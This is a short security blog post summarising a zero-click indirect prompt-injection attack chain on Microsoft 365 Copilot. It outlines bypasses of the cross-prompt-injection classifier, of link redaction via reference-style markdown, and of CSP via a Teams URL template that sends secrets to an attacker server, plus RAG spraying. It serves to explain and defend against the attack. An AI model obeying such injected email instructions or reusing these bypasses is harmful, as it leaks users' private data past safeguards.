In this blog you learn about M365 copilot vulnerability.

Zero-click attack chain results in compromising of Copilot data integrity

High Level

OWASP Top 10

  • Indirect prompt Injection

Exploitation technique

  • LLM Scope Violation

Risk

  • Data Exfiltration

Vulnerabilities

  • Bypassing XPIA Classifiers [AI Vulnerability]
  • Bypassing external link Redaction [Traditional Vulnerability]
  • Bypassing CSP [Traditional Vulnerability]

Security Measures

  • Runtime Guardrails
  • DLP

Brief Explanation

What is LLM Scope Violation

The term describes situations where an attacker’s specific instructions to the LLM (which originate in untrusted inputs) make the LLM attend to trusted data in the model’s context, without the user’s explicit consent

Attack Chain [How attack was performed]

  1. Bypassing Cross Prompt Injection [XPIA] . This was bypassed by directing email to recipient rather than LLM. MS Guardrail wasn’t good enough[AI Vulnerability]
  2. Bypassing Link Redaction, Reference-style markdown links are not redacted and are not recognized by Microsoft [Traditional Vulnerability]
  3. Bypassing CSP by using MS Team domain”https://eu-prod.asyncgw.teams.microsoft.com/urlp/v1/url/content?url=<attacker*_server>/<secret>&v=1*” [Traditional Vulnerability]

Exploitation

  1. RAG Spraying, distributing chunk their malicious content across many points in the latent space
  2. Attacker Email [Underprivileged program] accessing privileged data. Reaching attacker domain with Sensitive Data as parameters.

Leave a comment

I’m Ara

Welcome to Cloud Security Blog, my corner of the internet dedicated to Cloud and AI Security .

Let’s connect